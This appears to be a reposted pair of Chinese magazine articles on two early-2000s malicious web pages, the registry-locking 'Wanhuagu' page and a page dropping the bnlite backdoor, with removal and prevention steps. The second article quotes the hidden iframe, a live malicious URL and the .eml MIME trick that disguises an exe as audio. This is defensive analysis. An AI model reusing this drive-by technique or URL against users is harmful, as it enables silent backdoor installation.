主頁 > 知識(shí)庫 > 惡意代碼與網(wǎng)絡(luò)安全

惡意代碼與網(wǎng)絡(luò)安全

熱門標(biāo)簽:激戰(zhàn)黃昏地圖標(biāo)注說明 交行外呼系統(tǒng)有哪些 寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好 不同的地圖標(biāo)注 臨滄移動(dòng)外呼系統(tǒng)哪家有 隨州銷售外呼系統(tǒng)平臺(tái) 防城港市ai電銷機(jī)器人 怎么更改地圖標(biāo)注電話 溫嶺代理外呼系統(tǒng)
   瀏覽網(wǎng)頁會(huì)感染“病毒”,瀏覽網(wǎng)頁會(huì)感染木馬,你相信嗎?大約半年前就有人使用這種技術(shù)來進(jìn)行攻擊了!惡意代碼具有比較大的隱蔽性,到目前為止,還沒有什么病毒防火墻能很好地阻止惡意代碼的攻擊,大多數(shù)甚至根本就不能發(fā)現(xiàn)。 
《電腦報(bào)》今年25期D4版曾介紹了一個(gè)叫Gohip的網(wǎng)站,可以修改瀏覽器的默認(rèn)網(wǎng)址,使其指向Gohip網(wǎng)站。其實(shí)這還算客氣的了,如果你去瀏覽了一個(gè)叫“萬花谷”的網(wǎng)站,你就會(huì)感覺到Gohip算“仁慈”了。 

一、切身體驗(yàn) 

在打開多種病毒防火墻的情況下進(jìn)入該網(wǎng)站后都沒有報(bào)警,可鼠標(biāo)馬上變慢,當(dāng)離開該網(wǎng)站時(shí),突然彈開了無數(shù)個(gè)IE新窗口,馬上用“Alt+F4”關(guān)掉所有窗口,可緊接著Win 98報(bào)錯(cuò),按任何鍵都沒有反應(yīng),按動(dòng)“Ctrl+Alt+Del”關(guān)閉沒有反應(yīng)的程序,但是馬上出現(xiàn)藍(lán)屏、死機(jī)。重啟機(jī)器,出現(xiàn):“歡迎你來萬花谷,你中了‘萬花病毒'請(qǐng)與QQ:4040465聯(lián)系”的提示,按“確定”按鈕,可以進(jìn)入Win 98,不過桌面上已空空蕩蕩,點(diǎn)擊“開始”菜單,發(fā)現(xiàn)“關(guān)機(jī)”、“運(yùn)行”兩項(xiàng)都消失了,再次重啟機(jī)器依然如此。 

二、解決辦法 

如果你不小心中招,可以用下面三個(gè)辦法來解決: 

方法一: 

1.A盤啟動(dòng),在DOS環(huán)境下找到C:目錄(注意:sysbckup目錄是隱藏屬性,應(yīng)先用attrib命令去掉其隱藏屬性),可以找rb000.cab~rb004.cab這五個(gè)文件,這是最近的五個(gè)注冊(cè)表備份文件,選rb004.cab拷貝出來。 

2.在另外的機(jī)子上用ZIP解壓rb004.cab得到四個(gè)文件,把該四個(gè)文件復(fù)制到C:下覆蓋原文件。 

3.安全模式下啟動(dòng)電腦,運(yùn)行Msconfig,在“啟動(dòng)”標(biāo)簽中找到HA.hta,把多選框前面的“√”去掉。 

4.重啟動(dòng)機(jī)器一切OK。 

方法二:在DOS下用scanreg/restore注冊(cè)表,然后再刪除啟動(dòng)組中的HA.hta即可。 

方法三:利用“超級(jí)兔子”系統(tǒng)軟件或者“Windows優(yōu)化大師”恢復(fù)。 

“超級(jí)兔子”可以恢復(fù)對(duì)Windows系統(tǒng)的權(quán)限設(shè)置。打開快捷欄上的IE圖標(biāo)(因?yàn)橄到y(tǒng)鎖死了“資源管理器”,也可運(yùn)行“查找”功能)。 

在IE地址欄輸入需要進(jìn)入的目標(biāo)盤,如“E:u8221,找到超級(jí)兔子,打開“ms98.exe”。首先在工具選項(xiàng)里,點(diǎn)擊“高級(jí)隱藏”,在隱藏磁盤欄里去掉“C:”前面的鉤;然后點(diǎn)擊“桌面與圖標(biāo)”,在“顯示圖標(biāo)在桌面上”選項(xiàng)前加鉤。保存后,再點(diǎn)擊“安全與多用戶”,去掉在“啟動(dòng)時(shí)要顯示的標(biāo)題”和“啟動(dòng)時(shí)要顯示的信息”欄里的文字。在工具選項(xiàng)里點(diǎn)擊“IE 4/5”,“在IE標(biāo)題”欄里去掉文字,保存后OK! 

特別要說明的是,當(dāng)打開該頁面時(shí),它自動(dòng)更改了瀏覽器的默認(rèn)頁,所以改回Windows設(shè)置后一定要修改瀏覽器的默認(rèn)頁,不然下次上網(wǎng)又會(huì)進(jìn)入萬花頁面。 

三、預(yù)防辦法: 

1.不要輕易去一些自己并不了解的站點(diǎn)。 

2.在IE設(shè)置中將ActiveX插件和控件、Java腳本等全部禁止。方法是:在IE窗口中點(diǎn)擊“工具→Internet選項(xiàng)”,在彈出的對(duì)話框中選擇“安全”標(biāo)簽,再點(diǎn)擊“自定義級(jí)別”按鈕,就會(huì)彈出“安全設(shè)置”對(duì)話框,把其中所有ActiveX插件和控件以及Java相關(guān)全部選擇“禁用”即可。在Win 2000下把服務(wù)里面的遠(yuǎn)程注冊(cè)表操作服務(wù)“Remote Registry Service”禁用就可以了。方法是點(diǎn)擊“管理工具→服務(wù)→Remote Registry Service(允許遠(yuǎn)程注冊(cè)表操作)”,將這一項(xiàng)禁用。 

3. 既然“萬花谷”是通過修改注冊(cè)表來破壞我們的系統(tǒng),那么我們可以把注冊(cè)表加鎖,禁止修改注冊(cè)表,這樣就可以達(dá)到預(yù)防的目的。 

加鎖方法如下: 

(1)運(yùn)行注冊(cè)表編輯器regedit.exe; 

(2)到“HKEY_CURRENT_USER”下,新建一個(gè)名為“DisableRegistryTools”的DWORD值,并將其值改為“1”,即可禁止使用注冊(cè)表編輯器regedit.exe。 

解鎖方法如下: 

用記事本編輯一個(gè)任意名字的.reg文件,比如unlock.reg,內(nèi)容如下: 

REGEDIT4 

[HKEY_CURRENT_USER] “DisableRegistryTools”=dword:00000000 

存盤退出。如果要使用注冊(cè)表編輯器,則雙擊“unlock.reg”即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄! 

4. 對(duì)于所有用戶,可以通過升級(jí)到最新的KVW3000病毒庫,上網(wǎng)時(shí)打開KVW3000病毒防火墻來預(yù)防該類惡意網(wǎng)頁的侵害(注意:必須是6月28日以后的病毒庫方可)。

編者按:上期我們介紹的是“萬花谷”病毒攻防戰(zhàn),其實(shí)互聯(lián)網(wǎng)上類似的網(wǎng)站還很多,只要有帶新的病毒的網(wǎng)站出現(xiàn),我們就有義務(wù)告知大家。如果大家有網(wǎng)絡(luò)安全方面的稿件,請(qǐng)發(fā)xiongjie@cpcw.com信箱,我們將以最快速度把實(shí)用性強(qiáng)的文章刊登出來。 

一、切身體驗(yàn) 

在進(jìn)入木馬網(wǎng)頁的過程中,鼠標(biāo)奇怪地變成沙漏形狀,看來的確是有程序在運(yùn)行。打開計(jì)算機(jī)的任務(wù)管理器,可以看到多了一個(gè)wincfg.exe的進(jìn)程。進(jìn)程對(duì)應(yīng)的文件在Win2000下是c\winnt\wincfg.exe,在Win98下是c\windows\wincfg.exe。 

運(yùn)行注冊(cè)表編輯器regedit,在“HKEY_LOCAL_M(jìn)ACHINE\SOFTWARE\Microsoft\Windows\CurrentVerion\Run”下發(fā)現(xiàn)wincfg.exe,原來它將自己登記在注冊(cè)表開機(jī)啟動(dòng)項(xiàng)中,這樣每次開機(jī)都會(huì)自動(dòng)運(yùn)行wincfg.exe。(如圖) 

注:給你下套的人可以自己設(shè)定這個(gè)木馬的啟動(dòng)鍵名和注冊(cè)文件名,注冊(cè)文件名也就是運(yùn)行時(shí)進(jìn)程里的名稱,因此大家看到的結(jié)果可能不相同。 

運(yùn)行金山毒霸,報(bào)告發(fā)現(xiàn)“backdoor bnlite”,哦,原來是木馬bnlite服務(wù)端改名為wincfg.exe。別看這個(gè)木馬服務(wù)端程序不大(僅有6.5K),但它的功能可不少:具有ICQ通報(bào)功能、遠(yuǎn)程刪除服務(wù)端功能、設(shè)定端口和運(yùn)行名稱、上傳下載……如果你中了該木馬,那么木馬控制端完全可以通過這個(gè)木馬在你的電腦上建立一個(gè)隱藏的FTP服務(wù)器,別人就有最大權(quán)限進(jìn)入你的電腦了!這樣控制你的電腦將非常容易! 

木馬是如何下載到瀏覽了該主頁的計(jì)算機(jī)中、并運(yùn)行起來的呢?在IE中點(diǎn)擊“工具”→“Internet選項(xiàng)”→“安全”→“自定義安全級(jí)別”,將ActiveX相關(guān)選項(xiàng)全部都禁用,再瀏覽該網(wǎng)頁,wincfg.exe還是下載并運(yùn)行了!看來這和ActiveX無關(guān)。在“自定義安全級(jí)別”中有關(guān)文件下載的選項(xiàng)都禁止,再瀏覽該網(wǎng)頁,這回wincfg.exe不再下載了。 

二、問題揭示 

我們來看看wincfg.exe是如何下載到瀏覽者計(jì)算機(jī)上的,在該網(wǎng)頁上點(diǎn)擊鼠標(biāo)右鍵,選擇其中的“查看源代碼”,在網(wǎng)頁代碼最后面發(fā)現(xiàn)了可疑的語句: 

<iframe src=wincfg.eml width=1 height=1> 

注意到其中的“wincfg.eml”了嗎?大家都知道eml為郵件格式,網(wǎng)頁中要eml文件干什么呢?非??梢桑≡贗E瀏覽器中輸入:http//shirf.51.net/wincfg.eml,再看看任務(wù)管理器,wincfg.exe進(jìn)程又回來了,原來問題就在這個(gè)文件上!既然問題在這文件上,當(dāng)然得想辦法得到這個(gè)文件看看了。用螞蟻把文件下載下來,鼠標(biāo)剛點(diǎn)上去,wincfg.exe又被執(zhí)行了,真是陰魂不散?。?nbsp;

打開wincfg.eml,發(fā)現(xiàn)其關(guān)鍵內(nèi)容如下: 

Content-Type audio/x-wav name=“wincfg.exe” ★這一句定義了文件名稱,在此為wincfg.exe 

Content-Transfer-Encoding base64 ★定義了代碼格式為base64 

Content-ID <THE-CID> ★從這里開始才是代碼的起步 

TVqQAAMAAAAEAAAA//8AAL……以下刪掉一大節(jié) ★這些是wincfg.exe經(jīng)過base64編碼的內(nèi)容 

上面加了“★”的部分為注釋內(nèi)容。這個(gè)以base64方式編碼的文件,會(huì)在你瀏覽網(wǎng)頁時(shí)編譯成wincfg.exe文件并運(yùn)行,這就是瀏覽該網(wǎng)頁會(huì)中木馬的原因!至此我就明白了,其實(shí),所謂的瀏覽網(wǎng)頁會(huì)中木馬,只是網(wǎng)頁制作者利用了微軟IE瀏覽器中存在的漏洞進(jìn)行攻擊的一個(gè)案例而已,說白了就是利用了錯(cuò)誤的MIMEMultipurpose Internet Mail Extentions,多用途的網(wǎng)際郵件擴(kuò)充協(xié)議頭進(jìn)行攻擊。 

三、真相大白 

現(xiàn)在,再回過頭來看看我所中的木馬是怎么回事。其實(shí),wincfg.exe這個(gè)文件在這里相當(dāng)于郵件的附件,從我們所列的代碼中可以看到,攻擊者把wincfg.exe的類型定義為audio/x-wav,由于郵件的類型為audio/x-wav時(shí),IE存在的這個(gè)錯(cuò)誤的MIME頭漏洞會(huì)將附件認(rèn)為是音頻文件,并自動(dòng)嘗試打開,結(jié)果導(dǎo)致郵件文件wincfg.eml中的附件wincfg.exe(木馬)被執(zhí)行。在Win2000下,即使是用鼠標(biāo)點(diǎn)擊下載下來的wincfg.eml,或是拷貝粘貼該文件,都會(huì)導(dǎo)致wincfg.eml中的附件被運(yùn)行,微軟的這個(gè)漏洞可真是害人不淺啊?,F(xiàn)在看來,原先那些攻擊者想方設(shè)法欺騙被攻擊目標(biāo)執(zhí)行修改過的木馬等后門程序,是多么落后的手段??!如今,利用微軟“創(chuàng)造”的這個(gè)大漏洞來進(jìn)行攻擊,是多么簡(jiǎn)單、多么容易??!唯一的條件就是被攻擊目標(biāo)使用IE5.0及以上版本中的一種,使用IE瀏覽器的用戶到底有多少呢?看看你身邊的朋友就知道答案了! 

四、解決辦法 

1點(diǎn)擊“開始”→“運(yùn)行”,在彈出的對(duì)話框中輸入“regedit”,回車。然后展開注冊(cè)表到“HKEY_LOCAL_M(jìn)ACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下刪除wincfg.exe; 

2到你的計(jì)算機(jī)的系統(tǒng)目錄下,刪除其中的wincfg.exe文件; 

3重新啟動(dòng)機(jī)器,就一切OK了! 

五、預(yù)防方法 

1.IE和Outlook的用戶。 

1在IE的“工具→Internet選項(xiàng)→安全→Internet區(qū)域的安全級(jí)別”,把安全極別由“中”改為“高”。 

2點(diǎn)擊“自定義級(jí)別”按鈕,在彈出的窗口中,禁用“對(duì)標(biāo)記為可安全執(zhí)行腳本的ActiveX控件執(zhí)行腳本”、“活動(dòng)腳本”和“文件下載”功能。 

3禁用所有的ActiveX控制和插件。 

4將資源管理器設(shè)置成“始終顯示擴(kuò)展名”。 

5禁止以WEB方式使用資源管理器。 

6取消“下載后確認(rèn)打開”這種擴(kuò)展名屬性設(shè)置。 

2.不要受陌生人的誘惑打開別人給你的URL,如果確實(shí)想看,可以通過一些下載工具把頁面下載下來,然后用記事本等一些文本編輯工具打開查看代碼。 

3.微軟公司為該漏洞提供了一個(gè)補(bǔ)丁,趕快到下面所列出的URL去看看吧!

標(biāo)簽:沈陽 河源 哈密 紅河 忻州 無錫 青海 阜陽

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《惡意代碼與網(wǎng)絡(luò)安全》,本文關(guān)鍵詞  惡意,代碼,與,網(wǎng)絡(luò)安全,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《惡意代碼與網(wǎng)絡(luò)安全》相關(guān)的同類信息!
  • 本頁收集關(guān)于惡意代碼與網(wǎng)絡(luò)安全的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章